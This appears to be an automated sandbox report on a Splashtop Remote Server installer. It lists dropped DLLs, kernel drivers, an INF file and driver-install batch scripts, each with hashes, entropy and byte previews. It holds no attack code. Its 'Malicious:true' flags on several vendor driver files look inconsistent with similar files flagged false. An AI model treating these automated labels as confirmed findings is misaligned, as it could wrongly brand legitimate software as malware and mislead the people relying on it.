                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:/xr44ok0H+Re/1EPaTHV8GzXlGmYOom+rt12xROVSjfCKm/kIKz0+rIOsJ:/24ok0H+Re/1EPaiI1Y4O6Sv+q
                                                                                                                                                                                                                                                                                                                                  MD5:29F288F751FBCEA5CD75EA9774882787
                                                                                                                                                                                                                                                                                                                                  SHA1:5A4C30382C63E29E848B681D39CC213C2198E12E
                                                                                                                                                                                                                                                                                                                                  SHA-256:711702EB24803788CE601996F90B7EF57EEF1F764F7AAF3A96E2196ED4A9533E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B7FC0A739B33E79232EF506393CF90297F4D41F165F34B5BE50648D8A1967419E1F0EE369E809D5C142898824E8B5A3784106D33A2D1D72CD811D5352F4BBD60
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.<...R...R...R.......R...P...R.Rich..R.PE..d....._.........." .........l............................................................`.......................................................... ...h...........................................................................................................rdata..p...........................@..@.rsrc....h... ...j..................@..@......_........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....!...g...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\EvtLogProvider\stevt_srs_x86.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28160
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.7214568392805565
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:xXxr44ok0H+Re/1EPaTHV8GzXlGmYOom+rt12xROVSjfCKm/kIKz0+rIOsJ:xX24ok0H+Re/1EPaiI1Y4O6Sv+q
                                                                                                                                                                                                                                                                                                                                  MD5:BE32CA6CD3810D278DC07C2D67FA5A44
                                                                                                                                                                                                                                                                                                                                  SHA1:63C47D24563F3E19BADE1482BA91D57542736C6C
                                                                                                                                                                                                                                                                                                                                  SHA-256:2F28F5D4952FD4430568AFCCE023C4885B47BF7C705950B252555C7D92EEFB72
                                                                                                                                                                                                                                                                                                                                  SHA-512:C21FF9E2116F0C469642C47B85E6D36970344F6C929B018DB6BED88FEFB54AA9C82EDDA1F9123F1B493E9046DE2B46C44C62900967752110EA056B54CEB56E85
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.<...R...R...R.......R...P...R.Rich..R.................PE..L....._...........!.........l............................................................@.......................................... ...h...........................................................................................................rdata..p...........................@..@.rsrc....h... ...j..................@..@......_........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....!...g...rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1458184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.608368260050606
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:3u1d1TlM6S5+KpPH2+68gJ4dxM3GsFa8cihBUbo0h3yT26:3ub1T2B/+J4jMWsFa8cJbo0h3x6
                                                                                                                                                                                                                                                                                                                                  MD5:86FB762B6F48E0F579D8E1C20D829E5C
                                                                                                                                                                                                                                                                                                                                  SHA1:35643C93BAF6F1A0DC2607C2F65D339DD149FE71
                                                                                                                                                                                                                                                                                                                                  SHA-256:1837087E75DE428C18ACEC7F2EF7576752396A3A1EF15450230734E9EE194B28
                                                                                                                                                                                                                                                                                                                                  SHA-512:A0A53F0C256DD1ED0FA512E11A4AB936BD829B22E37C422194144CF022192B2C7157A4220BAD2ABF45CA6FF44FA3E954BE57147E57CB869D1E53399F5895FB13
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ..N...N...N...N...N.....N......N......N....~.N......N...O...N....9.N......N......N......N.Rich..N.................PE..L......e............................Ku.......0....@.................................(.....@..............................................................(...........5..............................pb..@............0..............................text............................... ..`.rdata..@....0......................@..@.data... ........j..................@....rsrc................&..............@..@.reloc..F,..........................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\WdfCoInstaller01009.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1721576
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.978334410477683
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:oU4MsColC6Je/ZgY7OOfcEpiRLH87SyVXGe38uKUj+NFVov1PJLfVKZ8F5mEeZWF:BFCsfZRZA6Xn388avVovfLd+Mo4iEF
                                                                                                                                                                                                                                                                                                                                  MD5:4DA5DA193E0E4F86F6F8FD43EF25329A
                                                                                                                                                                                                                                                                                                                                  SHA1:68A44D37FF535A2C454F2440E1429833A1C6D810
                                                                                                                                                                                                                                                                                                                                  SHA-256:18487B4FF94EDCCC98ED59D9FCA662D4A1331C5F1E14DF8DB3093256DD9F1C3E
                                                                                                                                                                                                                                                                                                                                  SHA-512:B3D73ED5E45D6F2908B2F3086390DD28C1631E298756CEE9BDF26B185F0B77D1B8C03AD55E0495DBA982C5BED4A03337B130C76F7112F3E19821127D2CF36853
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t.v...%...%...%.m+%...%.m:%...%...% ..%.m-%...%.m=%...%.m,%...%.m7%...%...%...%.m*%...%.m/%...%Rich...%........................PE..d.....[J.........." .........0............................................................@.........................................`................p..l!...`..,....,...............................................................................................text...L........................... ..`.data....J..........................@....pdata..,....`......................@..@.rsrc...l!...p..."..................@..@.reloc...............*..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\hidkmdf.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15072
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.857603927715577
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:yJaZmN9l0HNbsphoCqpQATeZjMcnYe+PjPGr9ZCApkT1rrZgjlerpLF+vctrie:kaZM0HlGOpQMejxnYPL/p1P6jeL3b
                                                                                                                                                                                                                                                                                                                                  MD5:3CDAE3B3A3AE968DB4756613EEFF3680
                                                                                                                                                                                                                                                                                                                                  SHA1:FF474C2D8A83BD5AF0A6B6CA954004D86BCF6FCA
                                                                                                                                                                                                                                                                                                                                  SHA-256:8DC9051BC452639550EC4F956F1DBBAC2D2A1886868C17743A3E4BE22297E166
                                                                                                                                                                                                                                                                                                                                  SHA-512:50E01496A3F891AC4BB455092427A4549406EAED44A292D415B8B42DF5FF72D1352EA6FCC66B2A11151AB9AE6590158753CC28E78F2DAC7FEBD5F6B8B4908126
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'N.OF .OF .OF .OF!.JF .F>..JF .F>..LF .F>..KF .F>..NF .F>..NF .F>..NF .RichOF .........................PE..d.....#Q.........."..................a......................................................................................................<a..<....p..x....@..l...................@ ............................................... ..8............................text............................... ..h.rdata....... ......................@..H.data........0......................@....pdata..l....@......................@..HPAGE.........P...................... ..`INIT....*....`...................... ....rsrc...x....p......................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\sthid.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21216
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.105547248727277
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:Zfhpq1BKeL/JQyyo0Y0HgWjkRtPzjn4nYPL/p1P6jeL3fq4:hhpq1BK8/JMYChMxXn4umiP
                                                                                                                                                                                                                                                                                                                                  MD5:A10A6FC3F643F82777345ADDC182799A
                                                                                                                                                                                                                                                                                                                                  SHA1:015BDFF614CD475C119C9CDC25950E8226930584
                                                                                                                                                                                                                                                                                                                                  SHA-256:8D09A7643A0095A0077710423E7D8D7134F9197B6F73DA427333790BA3774A61
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D2D6FDCCB9A99F95467E734AC83C77162D5D4509248A4BFDCE493BDD9D140220416095E0F75DDAB50071850FC0892CED2835336D1C42F4A3AC87F0D66C41ED8
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'F.SF(.SF(.SF(.Z>..PF(.SF).AF(.Z>..VF(.Z>..PF(.Z>..PF(.Z>..RF(.Z>..RF(.Z>..RF(.RichSF(.........PE..d.....#Q.........."..........&..............................................................................................................`...<.......@....`.. ....6...............0...............................................0...............................text............................... ..h.rdata..L....0......................@..H.data........@......................@....pdata.. ....`.......$..............@..HPAGE....x....p.......&.............. ..`INIT.................*.............. ....rsrc...@...........................@..B.reloc..<............4..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\WdfCoInstaller01009.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1461992
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.976326629681077
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:GjG90oN2lj11mk/22yYzGrarZRm4X5Uh6rVh5LdfBwOyCSQM1fFhSWRA2+:iGtN2h1120R7m4XShYVxfBwrC21fXSz
                                                                                                                                                                                                                                                                                                                                  MD5:A9970042BE512C7981B36E689C5F3F9F
                                                                                                                                                                                                                                                                                                                                  SHA1:B0BA0DE22ADE0EE5324EAA82E179F41D2C67B63E
                                                                                                                                                                                                                                                                                                                                  SHA-256:7A6BF1F950684381205C717A51AF2D9C81B203CB1F3DB0006A4602E2DF675C77
                                                                                                                                                                                                                                                                                                                                  SHA-512:8377049F0AAEF7FFCB86D40E22CE8AA16E24CAD78DA1FB9B24EDFBC7561E3D4FD220D19414FA06964692C54E5CBC47EC87B1F3E2E63440C6986CB985A65CE27D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.B...B...B...Kd1.E...B.......Kd7.Q...Kd .M...Kd6.C...Kd'.....e...C...Kd0.C...Kd5.C...RichB...........PE..L.....[J...........!.........N......C................................................S....@..........................................P...<...........6..................................................@............................................text............................... ..`.data....G..........................@....rsrc....<...P...>..................@..@.reloc...............*..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\hidkmdf.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):13024
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.821753253165571
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:hjJQAzeZjMpnYe+PjPGr9ZCApkT1rrZgjlerpLF+vctrMYPT:RJQUejknYPL/p1P6jeL32Y7
                                                                                                                                                                                                                                                                                                                                  MD5:C57099F9A63D144A9CDC103D2C42A6AC
                                                                                                                                                                                                                                                                                                                                  SHA1:F2AA1DBAC145BDA82DEDB69CA969EF4D0831C3DD
                                                                                                                                                                                                                                                                                                                                  SHA-256:D8390287A8865769BB50B0B83E7E7FC56B055BFC48D3513146CDB8D3954338BE
                                                                                                                                                                                                                                                                                                                                  SHA-512:18AB1AB0D233AEAAB786A28AEF766AAD9C683859628AEE94527C426DE7F63171345CAB4ECF96C54F19C93DF5E637A4D845C2487049DE161E19229F6253C775E4
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................................................Rich............................PE..L.....#Q.............................P....... ......................................r........................................P..<....`..x....................p..8... ............................................... .. ............................text............................... ..h.rdata....... ......................@..H.data........0......................@...PAGE....#....@...................... ..`INIT.........P...................... ....rsrc...x....`......................@..B.reloc..j....p......................@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\install_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):224
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.711399671949434
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dCiIc+JIIbdCiIevKIIlfRcGIIbdELVKT7:kidCicjdCiMt/jdx7
                                                                                                                                                                                                                                                                                                                                  MD5:001B12FA9D827E2A53675F4FFC5D68D8
                                                                                                                                                                                                                                                                                                                                  SHA1:0D1221A35F3FEF1B8B0B38E835BFB8F35357D3AB
                                                                                                                                                                                                                                                                                                                                  SHA-256:2C6E538B58C32DFFC7E3ED85175A2F5D08C5AA3FA68EE05207DB6A015D778DD1
                                                                                                                                                                                                                                                                                                                                  SHA-512:E85BAD69B1F36D36B96A03713B885FDDC485E7DA5A5FA4B07F5AFD7264BC9989F4AEA14822588F3921EFF4C6C5E7D2737CD382866A089DA8F4A19CAF69BC3FF3
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe /r remove @HID\sthid* >> inst.log..utils\devcon.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd.exe /u sthid.inf >> inst.log..utils\devcon.exe install sthid.inf HID\sthid >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\install_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.799817305367961
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:/Ajs/dRLPIc+JIIbdRLPIevKIIlBRcGIIbdRL6VKT7:kiddcjddMr/jdD7
                                                                                                                                                                                                                                                                                                                                  MD5:4D969376976863ABA27CCF817EB97219
                                                                                                                                                                                                                                                                                                                                  SHA1:F65EA3234AFC4741F48AF51EE83280520969BF5A
                                                                                                                                                                                                                                                                                                                                  SHA-256:C62D9158C0807D0EE3225E13BAD307199AF61DF1659ADCA91E1361865C325EEE
                                                                                                                                                                                                                                                                                                                                  SHA-512:88F38ED5AD7FECDE209782D1111C142BE63AE54D73A71E737BEBC0FB1498D7988AC9EC0173DEF5F6E0A17192A5F802145E69BFDA606B253AFBFE23B5058A7413
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon64.exe /r remove @HID\sthid* >> inst.log..utils\devcon64.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd64.exe /u sthid.inf >> inst.log..utils\devcon64.exe install sthid.inf HID\sthid >> inst.log..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\sthid.cat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):11968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.0656302139179195
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:5eMsGsZrVjbd/22z0yK2zFWQFyGZh4qnajA3vKkCTglckNVa:HsGsZr5pRpFRj0lo3CXkNk
                                                                                                                                                                                                                                                                                                                                  MD5:50BD9CFE7F724B3001FC833FF3FC284D
                                                                                                                                                                                                                                                                                                                                  SHA1:5A2D4C52C87170AFAE9F3F4DC75A81A046FF3EEB
                                                                                                                                                                                                                                                                                                                                  SHA-256:C7AE67C9A0669F2798ECA4452552F8F4919E2FB6D117ED290AC3F64966ECEEE0
                                                                                                                                                                                                                                                                                                                                  SHA-512:52CC8930BAC7CBE7AF9C2B64D8A3BCF874D76DDFA21691B3B47E4B5BE938BF42D1D0BF0B6BFA3EEEC61D81328B41FB608AC8DA5F278BF06C1AB294B0055FB3FF
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0.....*.H..........0......1.0...`.H.e......0..X..+.....7.....I0..E0...+.....7......C....G.|J].q.z..130223030803Z0...+.....7.....0...0.....c.....I..x.....c...1..0...+.....7...1...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...2...0R..+.....7...1D0B...F.i.l.e.......0w.d.f.c.o.i.n.s.t.a.l.l.e.r.0.1.0.0.9...d.l.l...0.... . q&H.Hv4;.s....N....uB^...@_.%1..0...+.....7...1...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...2...0R..+.....7...1D0B...F.i.l.e.......0w.d.f.c.o.i.n.s.t.a.l.l.e.r.0.1.0.0.9...d.l.l...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... . q&H.Hv4;.s....N....uB^...@_.%0.....o..5....,.SV..\....1~0...+.....7...1...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...2...06..+.....7...1(0&...F.i.l.e........s.t.h.i.d...i.n.f...0.... (..~......&vHk_..4U..:.Tu="|:H.1..0...+.....7...1...02..+.....7...1$0"...O.S.A.t.t.r........2.:.6...2...06..+.....7...1(0&...F.i.l.e........s.t.h.i.d...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... (..~......&

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\sthid.inf

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4350
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.269640657392187
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:BmLnkrr4fzkQCmlCDHCMmDtu6KgbNHYFMDO:BmLny0fzkklCmBtu4NHBDO
                                                                                                                                                                                                                                                                                                                                  MD5:6580EDB5B8713F3BFD3DF983758A4EA3
                                                                                                                                                                                                                                                                                                                                  SHA1:1E6FC7E435A3C3E20E2CFF5356DED95CF0C7D0EB
                                                                                                                                                                                                                                                                                                                                  SHA-256:815FBD6C3BFAE5EA77ED77480FAAC1AFAE946D4BF109B95480C60030A83AE1B1
                                                                                                                                                                                                                                                                                                                                  SHA-512:EA332A77DBDCC2184B2154EF496DAE4C663075447EC4ACF61E83A5AAACCF702E2F0E0F6D7F91E4499993A9B9D7C3A9A21C495EEAD606E2F5EB5F4DF272A86928
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Version]..Signature="$CHICAGO$"..Class=HIDClass..ClassGuid={745a17a0-74d3-11d0-b6fe-00a0c90f57da}..Provider=%splashtop%..DriverVer=02/18/2013,1.0.0.5..CatalogFile=sthid.cat....[SourceDisksFiles]..sthid.sys = 99..hidkmdf.sys = 99....[SourceDisksNames]..99 = %DISK_NAME%,,,""....[SourceDisksNames.AMD64]..99 = %DISK_NAME%,,,\64bits....[DestinationDirs]..CopyFunctionDriver = 12 ....[Manufacturer]..%splashtop%=Vendor, NTx86, NTx86.6.1, NTAMD64, NTAMD64.6.1....; For XP and later..[Vendor.NTx86]..%splashtop.DeviceDesc% = sthid.Inst, HID\StHid....[Vendor.NTAMD64]..%splashtop.DeviceDesc% = sthid.Inst, HID\StHid....; For Win7 and later so that we can use inbox HID-KMDF mapper..[Vendor.NTx86.6.1]..%splashtop.DeviceDesc% = sthid.Inst.Win7, HID\StHid....[Vendor.NTAMD64.6.1]..%splashtop.DeviceDesc% = sthid.Inst.Win7, HID\StHid....;===============================================================..; sthid for XP thru Vista..;===========================================================

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\sthid.sys

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18144
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.199619066707982
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:D+CpJmsGTJgbzPvaen0XUqcZzpV1DzjBnYPL/p1P6jeL3CX:B85e4+zpbXBumPX
                                                                                                                                                                                                                                                                                                                                  MD5:5904635A7888083EBB86C3A1218CB59B
                                                                                                                                                                                                                                                                                                                                  SHA1:69540333726CEF1EABD5B75D56822B36F9065840
                                                                                                                                                                                                                                                                                                                                  SHA-256:00648146272AF74EF5B1E74E83F58280FA1CC403621941AB3CB4E731756289F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:56B936EFBD05D0906577754334D9B1A562AE0AD25574E22149C6BD97950FD73809A4EF1542D4D7CAA4E5B81DF53975FDB1D57381232F9B8D17A463F1E1A81859
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q...Q...Q...X...R...Q...D...X...V...X...S...X...P...X...P...RichQ...........PE..L.....#Q............................v........ ..............................................................................<P..P....`..@............*.......p..t...` ............................................... ..`............................text... ........................... ..h.rdata....... ......................@..H.data...`....0......................@...PAGE....t....@...................... ..`INIT.........P...................... ....rsrc...@....`....... ..............@..B.reloc.......p.......&..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\uninstall_driver.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):164
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.75247427731045
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy/d/KiIKTAFshseJDo7EIbd/KiIKTA8vXto7EIl2YR41NDoC:/Ajs/dCiIc+JIIbdCiIevKIIlfRcGC
                                                                                                                                                                                                                                                                                                                                  MD5:6E5A084690CBEDCB4F74C1C365F2048E
                                                                                                                                                                                                                                                                                                                                  SHA1:379AF77A9066EE1EFEA1C17A21CF1C0AD7BF17FD
                                                                                                                                                                                                                                                                                                                                  SHA-256:F67BFB651037E84F5AE6965B5511FA1B9BD2C819B034A8284462AF01C0E0148F
                                                                                                                                                                                                                                                                                                                                  SHA-512:1ED233EF2BB513DCB9F3610AC36BBEB07259EAC7BA6F96E596B111C137F6B1BB35E1200ECAB3914925C6CCB80CD3A74ACEB40FA3775300151D34C7AB9C47A84F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:echo off..cd %~dp0..utils\devcon.exe /r remove @HID\sthid* >> inst.log..utils\devcon.exe /r remove HID\sthid >> inst.log..utils\DIFxCmd.exe /u sthid.inf >> inst.log

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\uninstall_driver64.bat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):172
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.845091480099467
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:jTDVBF+jVy/dRLX/IKTAFshseJDo7EIbdRLX/IKTA8vXto7EIl3xR41NDo7n:/Ajs/dRLPIc+JIIbdRLPIevKIIlBRcG7
                                                                                                                                                                                                                                                                                                                                  MD5:C949FE57CE36D8C5FF18AD66A5C83138
                                                                                                                                                                                                                                                                                                                                  SHA1:BE891CE4AF8434FB3A439F7F0CB9EC3E17BDB99A
                                                                                                                                                                                                                                                                                                                                  SHA-256:8A5E292037FFC57F78E8C8D8AE945C319A41FABEB2112099BA3FFD9D08D4C1AA
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F22FB7C586852EF5EDB8A28250B4BAA2194FE7599E1EF0733554E512ADCC7326D625F67CACD21C06A3B9A8B43AAF7B8E23D1C529FCC1B36D3E983AF5384FC4B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
